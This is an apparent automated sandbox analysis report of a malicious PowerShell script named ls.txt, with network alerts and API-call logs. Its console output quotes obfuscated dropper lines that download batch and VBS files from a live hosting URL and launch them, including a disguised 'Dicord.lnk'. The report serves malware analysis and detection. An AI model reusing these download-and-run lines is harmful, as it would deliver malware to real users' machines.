popup
Summary | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

ls.txt

Antivirus
  1. Resubmit sample
Category Machine Started Completed
FILE s1_win7_x6402 May 2, 2021, 6:24 p.m. May 2, 2021, 6:26 p.m.
Size 4.5KB
Type ASCII text
MD5 af14952111df8accaad09dfaaae03ae6
SHA256 2cef710ffbfe236e8fa4e468e4ce8ff83a8958c0b020cc9a06268b03d4474990
CRC32 5BE79E00
ssdeep 96:FF8nYbF8IYbqbYbZbX4bYbZbGbYbZb2bYbZb5ba/LxbYbZb/:FIqFqAqBXKqBsqBcqB5bEL5qB/
Yara
  • Antivirus - Contains references to security software

Name Response Post-Analysis Lookup
nyc002.hawkhost.com
A 172.96.186.134
172.96.186.134
IP Address Status Action
164.124.101.2 Active Moloch
172.217.25.14 Active Moloch
172.96.186.134 Active Moloch

Suricata Alerts

Flow SID Signature Category
TCP 192.168.56.102:49821 -> 172.96.186.134:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.102:49821 -> 172.96.186.134:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.102:49821 -> 172.96.186.134:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.102:49813 -> 172.96.186.134:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.102:49811 -> 172.96.186.134:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.102:49813 -> 172.96.186.134:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.102:49811 -> 172.96.186.134:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.102:49813 -> 172.96.186.134:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.102:49811 -> 172.96.186.134:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 172.96.186.134:443 -> 192.168.56.102:49821 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 172.96.186.134:443 -> 192.168.56.102:49821 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 172.96.186.134:443 -> 192.168.56.102:49813 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 172.96.186.134:443 -> 192.168.56.102:49811 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 172.96.186.134:443 -> 192.168.56.102:49813 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 172.96.186.134:443 -> 192.168.56.102:49811 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.102:49826 -> 172.96.186.134:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.102:49826 -> 172.96.186.134:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.102:49824 -> 172.96.186.134:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.102:49820 -> 172.96.186.134:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.102:49826 -> 172.96.186.134:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.102:49824 -> 172.96.186.134:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.102:49820 -> 172.96.186.134:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.102:49824 -> 172.96.186.134:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.102:49820 -> 172.96.186.134:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 172.96.186.134:443 -> 192.168.56.102:49826 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 172.96.186.134:443 -> 192.168.56.102:49826 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 172.96.186.134:443 -> 192.168.56.102:49824 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 172.96.186.134:443 -> 192.168.56.102:49820 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 172.96.186.134:443 -> 192.168.56.102:49824 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 172.96.186.134:443 -> 192.168.56.102:49820 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.102:49830 -> 172.96.186.134:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.102:49829 -> 172.96.186.134:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.102:49830 -> 172.96.186.134:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.102:49829 -> 172.96.186.134:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.102:49830 -> 172.96.186.134:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.102:49829 -> 172.96.186.134:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 172.96.186.134:443 -> 192.168.56.102:49829 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 172.96.186.134:443 -> 192.168.56.102:49830 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 172.96.186.134:443 -> 192.168.56.102:49829 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 172.96.186.134:443 -> 192.168.56.102:49830 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.102:49810 -> 172.96.186.134:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.102:49810 -> 172.96.186.134:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.102:49810 -> 172.96.186.134:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 172.96.186.134:443 -> 192.168.56.102:49810 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 172.96.186.134:443 -> 192.168.56.102:49810 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.102:49814 -> 172.96.186.134:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.102:49814 -> 172.96.186.134:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.102:49814 -> 172.96.186.134:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 172.96.186.134:443 -> 192.168.56.102:49814 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 172.96.186.134:443 -> 192.168.56.102:49814 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

 buffer: Mode LastWriteTime Length Name
console_handle: 0x0000001b
1 1 0

WriteConsoleW

 buffer: d---- 2021-05-02 오후 6:24 Start
console_handle: 0x00000023
1 1 0

WriteConsoleW

 buffer: Exception calling "DownloadFile" with "2" argument(s): "The underlying connecti
console_handle: 0x00000023
1 1 0

WriteConsoleW

 buffer: on was closed: An unexpected error occurred on a send."
console_handle: 0x0000002f
1 1 0

WriteConsoleW

 buffer: At C:\Users\test22\AppData\Local\Temp\ls.txt.ps1:83 char:72
console_handle: 0x0000003b
1 1 0

WriteConsoleW

 buffer: + if((New-Object "`N`e`T`.`W`e`B`C`l`i`e`N`T")."`D`o`w`N`l`o`A`d`F`i`l`e" <<<<
console_handle: 0x00000047
1 1 0

WriteConsoleW

 buffer: ('https://nyc002.hawkhost.com/~mazenne1/NDef/all.bat', $defender + '11.ps1')){
console_handle: 0x00000053
1 1 0

WriteConsoleW

 buffer: + CategoryInfo : NotSpecified: (:) [], MethodInvocationException
console_handle: 0x0000005f
1 1 0

WriteConsoleW

 buffer: + FullyQualifiedErrorId : DotNetMethodException
console_handle: 0x0000006b
1 1 0

WriteConsoleW

 buffer: Exception calling "DownloadFile" with "2" argument(s): "The underlying connecti
console_handle: 0x0000008b
1 1 0

WriteConsoleW

 buffer: on was closed: An unexpected error occurred on a send."
console_handle: 0x00000097
1 1 0

WriteConsoleW

 buffer: At C:\Users\test22\AppData\Local\Temp\ls.txt.ps1:88 char:72
console_handle: 0x000000a3
1 1 0

WriteConsoleW

 buffer: + if((New-Object "`N`e`T`.`W`e`B`C`l`i`e`N`T")."`D`o`w`N`l`o`A`d`F`i`l`e" <<<<
console_handle: 0x000000af
1 1 0

WriteConsoleW

 buffer: ('https://nyc002.hawkhost.com/~mazenne1/ExDef/ss.vbs', $def + 'ss.vbs')){
console_handle: 0x000000bb
1 1 0

WriteConsoleW

 buffer: + CategoryInfo : NotSpecified: (:) [], MethodInvocationException
console_handle: 0x000000c7
1 1 0

WriteConsoleW

 buffer: + FullyQualifiedErrorId : DotNetMethodException
console_handle: 0x000000d3
1 1 0

WriteConsoleW

 buffer: Start-Process : This command cannot be executed due to the error: The system ca
console_handle: 0x000000f3
1 1 0

WriteConsoleW

 buffer: nnot find the file specified.
console_handle: 0x000000ff
1 1 0

WriteConsoleW

 buffer: At C:\Users\test22\AppData\Local\Temp\ls.txt.ps1:91 char:6
console_handle: 0x0000010b
1 1 0

WriteConsoleW

 buffer: + start <<<< "C:\Users\Public\ss.vbs"
console_handle: 0x00000117
1 1 0

WriteConsoleW

 buffer: + CategoryInfo : InvalidOperation: (:) [Start-Process], InvalidOp
console_handle: 0x00000123
1 1 0

WriteConsoleW

 buffer: erationException
console_handle: 0x0000012f
1 1 0

WriteConsoleW

 buffer: + FullyQualifiedErrorId : InvalidOperationException,Microsoft.PowerShell.C
console_handle: 0x0000013b
1 1 0

WriteConsoleW

 buffer: ommands.StartProcessCommand
console_handle: 0x00000147
1 1 0

WriteConsoleW

 buffer: Start-Process : This command cannot be executed due to the error: The system ca
console_handle: 0x00000167
1 1 0

WriteConsoleW

 buffer: nnot find the file specified.
console_handle: 0x00000173
1 1 0

WriteConsoleW

 buffer: At C:\Users\test22\AppData\Local\Temp\ls.txt.ps1:105 char:6
console_handle: 0x0000017f
1 1 0

WriteConsoleW

 buffer: + Start <<<< "C:\ProgramData\Microsoft Arts\Start\Dicord.lnk"
console_handle: 0x0000018b
1 1 0

WriteConsoleW

 buffer: + CategoryInfo : InvalidOperation: (:) [Start-Process], InvalidOp
console_handle: 0x00000197
1 1 0

WriteConsoleW

 buffer: erationException
console_handle: 0x000001a3
1 1 0

WriteConsoleW

 buffer: + FullyQualifiedErrorId : InvalidOperationException,Microsoft.PowerShell.C
console_handle: 0x000001af
1 1 0

WriteConsoleW

 buffer: ommands.StartProcessCommand
console_handle: 0x000001bb
1 1 0

WriteConsoleW

 buffer: Start-Process : This command cannot be executed due to the error: The system ca
console_handle: 0x000001db
1 1 0

WriteConsoleW

 buffer: nnot find the file specified.
console_handle: 0x000001e7
1 1 0

WriteConsoleW

 buffer: At C:\Users\test22\AppData\Local\Temp\ls.txt.ps1:107 char:6
console_handle: 0x000001f3
1 1 0

WriteConsoleW

 buffer: + Start <<<< "C:\ProgramData\Microsoft Arts\Start\Dicord.lnk"
console_handle: 0x000001ff
1 1 0

WriteConsoleW

 buffer: + CategoryInfo : InvalidOperation: (:) [Start-Process], InvalidOp
console_handle: 0x0000020b
1 1 0

WriteConsoleW

 buffer: erationException
console_handle: 0x00000217
1 1 0

WriteConsoleW

 buffer: + FullyQualifiedErrorId : InvalidOperationException,Microsoft.PowerShell.C
console_handle: 0x00000223
1 1 0

WriteConsoleW

 buffer: ommands.StartProcessCommand
console_handle: 0x0000022f
1 1 0

WriteConsoleW

 buffer: Exception calling "DownloadFile" with "2" argument(s): "The underlying connecti
console_handle: 0x00000023
1 1 0

WriteConsoleW

 buffer: on was closed: An unexpected error occurred on a send."
console_handle: 0x0000002f
1 1 0

WriteConsoleW

 buffer: At line:1 char:44
console_handle: 0x0000003b
1 1 0

WriteConsoleW

 buffer: + & { (New-Object Net.WebClient).DownloadFile <<<< ('https://nyc002.hawkhost.co
console_handle: 0x00000047
1 1 0

WriteConsoleW

 buffer: m/~mazenne1/ExDef/GoogleUpdate.bat', 'C:\Users\Public\GoogleUpdate.bat') }
console_handle: 0x00000053
1 1 0

WriteConsoleW

 buffer: + CategoryInfo : NotSpecified: (:) [], MethodInvocationException
console_handle: 0x0000005f
1 1 0

WriteConsoleW

 buffer: + FullyQualifiedErrorId : DotNetMethodException
console_handle: 0x0000006b
1 1 0

WriteConsoleW

 buffer: Exception calling "DownloadFile" with "2" argument(s): "The underlying connecti
console_handle: 0x00000023
1 1 0

WriteConsoleW

 buffer: on was closed: An unexpected error occurred on a send."
console_handle: 0x0000002f
1 1 0

WriteConsoleW

 buffer: At line:1 char:44
console_handle: 0x0000003b
1 1 0
Time & API Arguments Status Return Repeated

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x050810a0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x050810a0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x05081220
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x05081220
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x05081220
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x05081220
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x05081220
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x05081220
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x05081220
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x05081220
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x05081220
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x05081220
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x05081220
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x05081220
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x05081220
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002c3ed0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002c4c90
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002c4c90
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002c4c90
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002c4b90
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002c4b90
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002c4b90
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002c4b90
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002c4b90
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002c4b90
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002c4710
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002c4710
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002c4710
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002c4c90
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002c4c90
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002c4c90
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002c4350
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002c4c90
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002c4c90
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002c4c90
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002c4c90
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002c4c90
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002c4c90
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002c4c90
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002c3f10
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002c3f10
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002c3f10
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002c3f10
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002c3f10
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002c3f10
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002c3f10
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002c3f10
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002c3f10
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002c3f10
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002c3f10
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

 1 1 0
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

 process_identifier: 5580
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0263b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 5580
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0264f000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 5580
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02619000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 5580
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x063a0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 5580
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x063a1000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 5580
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x063a2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 5580
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05821000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 5580
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x063a3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 5580
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x063a4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 5580
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x063a5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 5580
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x063b0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 5580
region_size: 327680
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7ef40000
allocation_type: 1056768 (MEM_RESERVE|MEM_TOP_DOWN)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 5580
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7ef40000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 5580
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7ef40000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 5580
region_size: 65536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7ef30000
allocation_type: 1056768 (MEM_RESERVE|MEM_TOP_DOWN)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 5580
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7ef30000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 5580
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02649000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 5580
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02992000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 5580
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02993000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 5580
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x063b1000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 5580
region_size: 1638400
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x06af0000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 5580
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x06c40000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 5580
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x06c41000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 5580
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x06c42000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 5580
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x06c43000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 5580
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
